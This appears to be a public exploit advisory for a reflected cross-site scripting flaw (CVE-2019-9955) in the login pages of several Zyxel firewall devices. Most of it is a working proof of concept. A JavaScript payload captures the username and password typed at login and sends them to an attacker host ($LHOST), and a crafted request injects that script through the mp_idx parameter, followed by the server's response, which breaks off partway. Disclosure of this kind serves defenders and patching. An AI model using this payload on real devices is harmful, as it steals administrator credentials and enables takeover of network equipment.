# Exploit Title: Reflected XSS on Zyxel login pages # Date: 10 Apr 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: https://www.zyxel.com/us/en/ # Version: V4.31 # Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi # CVE : 2019-9955 1. Description ============== Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the mp_idx parameter on weblogin.cgi and webauth_relogin.cgi. 2. Proof of Concept ============= Host a malicious file JavaScript file named 'z', or any other single character, locally. The contents of 'z' for the following example are: ----- $("button").click(function() { $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname}); }); ----- Close the mp_idx variable with "; and Use the getScript functionality of jQuery to include the malicious file: Request: GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1 Host: $RHOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Wed, 10 Apr 2019 23:13:39 GMT Cache-Control: no-cache, private Pragma: no-cache Expires: Mon, 16 Apr 1973 13:10:00 GMT Connection: close Content-Type: text/html Content-Length: 7957 Welcome